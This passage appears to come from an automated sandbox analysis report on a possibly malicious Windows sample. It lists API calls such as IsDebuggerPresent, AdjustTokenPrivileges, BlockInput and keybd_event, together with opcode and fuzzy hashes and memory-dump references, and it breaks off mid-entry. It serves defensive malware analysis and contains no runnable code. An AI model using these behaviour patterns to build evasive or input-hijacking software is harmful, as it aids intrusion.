              • Instruction ID: 129404737919c7410d2705fcaff36fe9de98f035896fdfe152072b2e7bf3ceb6
              • Opcode Fuzzy Hash: 4bd650200eb1c085d6d9ef9c9f27ca8063e517b6d0ee1f2c7e1094429be5ee9a
              • Instruction Fuzzy Hash: E131E7B1A40248BEFF35CB65CC06BFABBAAAB44310F04821AE5C1565D2D37D8981C767
              APIs
              • InternetReadFile.WININET(?,?,00000400,?), ref: 0074CE89
              • GetLastError.KERNEL32(?,00000000), ref: 0074CEEA
              • SetEvent.KERNEL32(?,?,00000000), ref: 0074CEFE
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorEventFileInternetLastRead
              • String ID:
              • API String ID: 234945975-0
              • Opcode ID: 370d55c21c6df1f56bf593ecd3ddd77ff4c135276c20d69096285406fc835a3a
              • Instruction ID: 5e83847490e8a6298e77c76b65a89ae602836447611fa2be20e10eb850a88be2
              • Opcode Fuzzy Hash: 370d55c21c6df1f56bf593ecd3ddd77ff4c135276c20d69096285406fc835a3a
              • Instruction Fuzzy Hash: 8021CFB2501305DFEB62DFA5C948BA77BFCEB00314F10842EE646D2151E778EE088B54
              APIs
              • IsDebuggerPresent.KERNEL32 ref: 0070271A
              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00702724
              • UnhandledExceptionFilter.KERNEL32(?), ref: 00702731
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled$DebuggerPresent
              • String ID:
              • API String ID: 3906539128-0
              • Opcode ID: 10c37ab6fa80ee9a3f2465fad78fcb503204293edf5eb32fb2fad4c58867823e
              • Instruction ID: 6de7ad7c03e04120af60d7a20141a5c827c0e0574be8d558ef923d8ef415efe7
              • Opcode Fuzzy Hash: 10c37ab6fa80ee9a3f2465fad78fcb503204293edf5eb32fb2fad4c58867823e
              • Instruction Fuzzy Hash: 9631C47591121C9BCB61DF68DC88798BBB8BF08310F5042EAE90CA6261E7749F818F49
              APIs
              • SetErrorMode.KERNEL32(00000001), ref: 007451DA
              • GetDiskFreeSpaceExW.KERNEL32(?,?,?,?), ref: 00745238
              • SetErrorMode.KERNEL32(00000000), ref: 007452A1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorMode$DiskFreeSpace
              • String ID:
              • API String ID: 1682464887-0
              • Opcode ID: 1368a1a95e7841840ae6ee3b64f494694afe8f662db0178cf1cb354328d4a80a
              • Instruction ID: cb428331a942e173e58d8081716f406feec75a5c1e3b666248eb3a6dbb6df7db
              • Opcode Fuzzy Hash: 1368a1a95e7841840ae6ee3b64f494694afe8f662db0178cf1cb354328d4a80a
              • Instruction Fuzzy Hash: F3318F75A00608DFDB00DF94D884EADBBB5FF49314F08809AE805AB362DB75EC46CB91
              APIs
                • Part of subcall function 006EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0668
                • Part of subcall function 006EFDDB: __CxxThrowException@8.LIBVCRUNTIME ref: 006F0685
              • LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 0073170D
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 0073173A
              • GetLastError.KERNEL32 ref: 0073174A
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Exception@8Throw$AdjustErrorLastLookupPrivilegePrivilegesTokenValue
              • String ID:
              • API String ID: 577356006-0
              • Opcode ID: b3972c858636e6ab0fa7aff2e3fdc459fc30a003364eef0cd6d1f50bdbc1210d
              • Instruction ID: 058585ce52833b0e7ae5efef695a214eb2aea3def8902183c3392c42866e24c2
              • Opcode Fuzzy Hash: b3972c858636e6ab0fa7aff2e3fdc459fc30a003364eef0cd6d1f50bdbc1210d
              • Instruction Fuzzy Hash: 0011C1B2404309AFE718AF54DC86D6ABBBDEF04754B24852EE05657242EB75BC418B24
              APIs
              • CreateFileW.KERNEL32(?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073D608
              • DeviceIoControl.KERNEL32(00000000,002D1400,?,0000000C,?,00000028,?,00000000), ref: 0073D645
              • CloseHandle.KERNEL32(?,?,00000080,00000003,00000000,00000003,00000080,00000000), ref: 0073D650
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: CloseControlCreateDeviceFileHandle
              • String ID:
              • API String ID: 33631002-0
              • Opcode ID: 92cd15ec0e4607a55dfc0f5c3501bdad32f40509ec84ba31778af0b7981eb8b4
              • Instruction ID: 4b94de717043dfe8f0183ecbf240466d265ef23043a4e2c3a595e0f54d22b1a6
              • Opcode Fuzzy Hash: 92cd15ec0e4607a55dfc0f5c3501bdad32f40509ec84ba31778af0b7981eb8b4
              • Instruction Fuzzy Hash: 4C117C71E01228BFEB208F95EC45FAFBBBCEB45B50F108111F914E7290C2B44A058BA1
              APIs
              • AllocateAndInitializeSid.ADVAPI32(?,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,?,?), ref: 0073168C
              • CheckTokenMembership.ADVAPI32(00000000,?,?), ref: 007316A1
              • FreeSid.ADVAPI32(?), ref: 007316B1
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AllocateCheckFreeInitializeMembershipToken
              • String ID:
              • API String ID: 3429775523-0
              • Opcode ID: fe61f2be3367b20cc2006f2da4fc4e16b2eacfb869aaa6c095d1f1dea4584750
              • Instruction ID: ce25ff58142e55fb1f2cacf6199394dbe537d454f2c16ef468f29fa9f995e1fd
              • Opcode Fuzzy Hash: fe61f2be3367b20cc2006f2da4fc4e16b2eacfb869aaa6c095d1f1dea4584750
              • Instruction Fuzzy Hash: 29F0F471950309FBEB00DFE49D89AAEBBBCEB08604F508565E601E2181E778AA448A54
              APIs
              • GetCurrentProcess.KERNEL32(007028E9,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000,?,007028E9), ref: 006F4D09
              • TerminateProcess.KERNEL32(00000000,?,006F4CBE,007028E9,007988B8,0000000C,006F4E15,007028E9,00000002,00000000,?,007028E9), ref: 006F4D10
              • ExitProcess.KERNEL32 ref: 006F4D22
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Process$CurrentExitTerminate
              • String ID:
              • API String ID: 1703294689-0
              • Opcode ID: 1718cc2e888df65891bc45fcf5e540061adf48f7a6a3b0a8cc9986c471beacb1
              • Instruction ID: 53034d1fc41a8cb638c4b4dab46f84ac2bb22d4284ca608a6440f235a070d544
              • Opcode Fuzzy Hash: 1718cc2e888df65891bc45fcf5e540061adf48f7a6a3b0a8cc9986c471beacb1
              • Instruction Fuzzy Hash: A8E0B63100024CABDF12AF55DD09AAA3F6AEF86781B108018FD569A722DB79DD42CA84
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: /
              • API String ID: 0-2043925204
              • Opcode ID: 3b70dd2df338deecaea4cae5e0a9675701409c17ec331c537c5c7a859d3da43e
              • Instruction ID: e4962ac9915e105f42fb9ed5e245cadedddf7245ddaaffb5c048f85a8d2ff4cb
              • Opcode Fuzzy Hash: 3b70dd2df338deecaea4cae5e0a9675701409c17ec331c537c5c7a859d3da43e
              • Instruction Fuzzy Hash: 15411372900219EBCB209FB9DC89EBBB7B8EB84314F1083A9F905D71C0E6749D818B50
              APIs
              • GetUserNameW.ADVAPI32(?,?), ref: 0072D28C
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: NameUser
              • String ID: X64
              • API String ID: 2645101109-893830106
              • Opcode ID: b8cfc341ca2d6c387d59d4fa769c0111609583b75a211ffec9d90fcdf6681f46
              • Instruction ID: 1119d53399aea9467d0e0056da3568c405e23970d8a8cd78d314b90c0294ea57
              • Opcode Fuzzy Hash: b8cfc341ca2d6c387d59d4fa769c0111609583b75a211ffec9d90fcdf6681f46
              • Instruction Fuzzy Hash: 8BD0C9B480122DEACB90CB90EC88DE9B3BCBB04305F104151F106A2000D77495498F20
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction ID: ba0365c1a72ca61a4afb93015a2935d88e6a427ea186bc285cec63f6549ed68a
              • Opcode Fuzzy Hash: 2fbdbeface8d474e65e3d830227d731b015bc4fe83c76ff0107a9da6199ccf29
              • Instruction Fuzzy Hash: 73020B71E0111D9BDF14CFA9C9806EDFBB2EF48324F254169D919EB384D731A941CB94
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: Variable is not of type 'Object'.$p#z
              • API String ID: 0-3775082255
              • Opcode ID: c51b3ba3e65c5e96f5d91a15267fe8a92129cdd6abfe6ba7ffc4acf5b93fc963
              • Instruction ID: c77ace521d97e9d5065aeab2a68c06def175dfd7d0993c73d22dcdbcd5200f6e
              • Opcode Fuzzy Hash: c51b3ba3e65c5e96f5d91a15267fe8a92129cdd6abfe6ba7ffc4acf5b93fc963
              • Instruction Fuzzy Hash: 44327B70D00219DBCF14DF94D895AEDB7B6FF05314F24805AE806AB392D779AE46CBA0
              APIs
              • FindFirstFileW.KERNEL32(?,?), ref: 00746918
              • FindClose.KERNEL32(00000000), ref: 00746961
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: Find$CloseFileFirst
              • String ID:
              • API String ID: 2295610775-0
              • Opcode ID: b0fbcef897da9bea61239b0c047e1023915fba8999aefa7a7093640c398d35d2
              • Instruction ID: 2b3f235004075b184e7897b598c60a9ae3230abdf1cd7d8b6e16b88bbccaa9a2
              • Opcode Fuzzy Hash: b0fbcef897da9bea61239b0c047e1023915fba8999aefa7a7093640c398d35d2
              • Instruction Fuzzy Hash: DC1190716042019FD710DF29D484A26BBE5FF85328F14C69EE8698F3A2CB74EC05CB91
              APIs
              • GetLastError.KERNEL32(00000000,?,00000FFF,00000000,?,?,?,00754891,?,?,00000035,?), ref: 007437E4
              • FormatMessageW.KERNEL32(00001000,00000000,?,00000000,?,00000FFF,00000000,?,?,?,00754891,?,?,00000035,?), ref: 007437F4
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ErrorFormatLastMessage
              • String ID:
              • API String ID: 3479602957-0
              • Opcode ID: eeeb3748f0d9b9cd206abbd29b1514b920e9d5f0827959c6d410a24b046f5aba
              • Instruction ID: 451ca3856260a129efc65e0ee2f8adc78b029877127fe934cec231ddd7e37ac2
              • Opcode Fuzzy Hash: eeeb3748f0d9b9cd206abbd29b1514b920e9d5f0827959c6d410a24b046f5aba
              • Instruction Fuzzy Hash: 7CF0E5B06053286AE76117668C8DFEB3AAEEFC4761F004265F509D22C1DAB49944C6B0
              APIs
              • SendInput.USER32(00000001,?,0000001C,?,?,00000002), ref: 0073B25D
              • keybd_event.USER32(?,7694C0D0,?,00000000), ref: 0073B270
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: InputSendkeybd_event
              • String ID:
              • API String ID: 3536248340-0
              • Opcode ID: 0b9322a0ada63b926752078078164d882f61f2b2d9f033001b7b2244826bcd80
              • Instruction ID: 6df41ec45da500ad7f6b0bc06ff971cdef3be87976634d45c7f951161a561928
              • Opcode Fuzzy Hash: 0b9322a0ada63b926752078078164d882f61f2b2d9f033001b7b2244826bcd80
              • Instruction Fuzzy Hash: F7F0127180424DABDB059FA1C8057BE7BB4FF04305F148009F955A5192C77D86119F94
              APIs
              • AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,007311FC), ref: 007310D4
              • CloseHandle.KERNEL32(?,?,007311FC), ref: 007310E9
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: AdjustCloseHandlePrivilegesToken
              • String ID:
              • API String ID: 81990902-0
              • Opcode ID: 0c81c028360bf33ce80bfcaa292c82e6c64f4e96744a20b51d712221978ea4f1
              • Instruction ID: 0472cc47743c23b4a69a508b70ba4da402f138558793fee8756d09e48af970e2
              • Opcode Fuzzy Hash: 0c81c028360bf33ce80bfcaa292c82e6c64f4e96744a20b51d712221978ea4f1
              • Instruction Fuzzy Hash: 08E04F32008740AFF7262B12FC05E777BA9EF04310F10C82DF4A6804B1DBA26C90DB14
              APIs
              • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,00706766,?,?,00000008,?,?,0070FEFE,00000000), ref: 00706998
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionRaise
              • String ID:
              • API String ID: 3997070919-0
              • Opcode ID: bafe0fec2148d9f80ad823e64421f9f7561004f523f59739c99b8bdad8f904e5
              • Instruction ID: 7e1ce935d055ed727ac09b44ab553ceba95f5c1b5a756cb68a1575e2e3a477ea
              • Opcode Fuzzy Hash: bafe0fec2148d9f80ad823e64421f9f7561004f523f59739c99b8bdad8f904e5
              • Instruction Fuzzy Hash: D1B10571610608DFDB15CF28C49AB657BE0FB45364F25C658E899CF2E2C339E9A1CB40
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID: 0-3916222277
              • Opcode ID: 302f7e0a285ee33d16a564a68d366b9222082ee351ff8102c472410c7a6da864
              • Instruction ID: 0a38e2fa34a2571865719cf329d9a6ff479ba65fcd3c584dcf644860f6bfdf72
              • Opcode Fuzzy Hash: 302f7e0a285ee33d16a564a68d366b9222082ee351ff8102c472410c7a6da864
              • Instruction Fuzzy Hash: 11127F71901229DBCB54CF59D881AEEB7F5FF48310F1481AAE809EB255EB349E81CF91
              APIs
              • BlockInput.USER32(00000001), ref: 0074EABD
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: BlockInput
              • String ID:
              • API String ID: 3456056419-0
              • Opcode ID: f3d81005c38b7611183402324b452e2980b936fdf5a5f03f3ac515f1accfb41a
              • Instruction ID: 40037cca7cd9eb2455f7838ba556cfbcf0cf3592421f0df82704f92a4fce4f06
              • Opcode Fuzzy Hash: f3d81005c38b7611183402324b452e2980b936fdf5a5f03f3ac515f1accfb41a
              • Instruction Fuzzy Hash: 11E01A312002059FC710EF59D804EAAB7E9BF98770F00C41AFD8AC7361DBB4A8408B94
              APIs
              • SetUnhandledExceptionFilter.KERNEL32(Function_000209E1,006F03EE), ref: 006F09DA
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID: ExceptionFilterUnhandled
              • String ID:
              • API String ID: 3192549508-0
              • Opcode ID: f489ea8c91d0fb0b7a3c1d3df5387af7881b36bf58a62d3a021276c51cd31ab5
              • Instruction ID: affbd668b4b02449cdead1a49988709635f711dc891ddf25beb500da3dd9948e
              • Opcode Fuzzy Hash: f489ea8c91d0fb0b7a3c1d3df5387af7881b36bf58a62d3a021276c51cd31ab5
              • Instruction Fuzzy Hash:
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127631726.000000000079C000.00000004.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127648208.00000000007A4000.00000002.00000001.01000000.00000003.sdmp
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_0_2_6d0000_QLLafoDdqv.jbxd
              Similarity
              • API ID:
              • String ID: 0
              • API String ID: 0-4108050209
              • Opcode ID: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction ID: 49cd43dd53e8c6a144dd8756219a9541778ea1c39d6a0f3090c4c4d325dec89c
              • Opcode Fuzzy Hash: 9084b4e029052128895840c3c28e948f6724b1d83b91d22a18243ac96ad56844
              • Instruction Fuzzy Hash: 6951797160C70D5BDB388968885E7FE67DB9B12380F18052EEB92D7382CA55DE03D35A
              Strings
              Memory Dump Source
              • Source File: 00000000.00000002.2127518788.00000000006D1000.00000020.00000001.01000000.00000003.sdmp, Offset: 006D0000, based on PE: true
               • Associated: 00000000.00000002.2127482302.00000000006D0000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.000000000076C000.00000002.00000001.01000000.00000003.sdmp
               • Associated: 00000000.00000002.2127589369.0000000000792000.00000002.00000001.01000000.00000003.sdmp
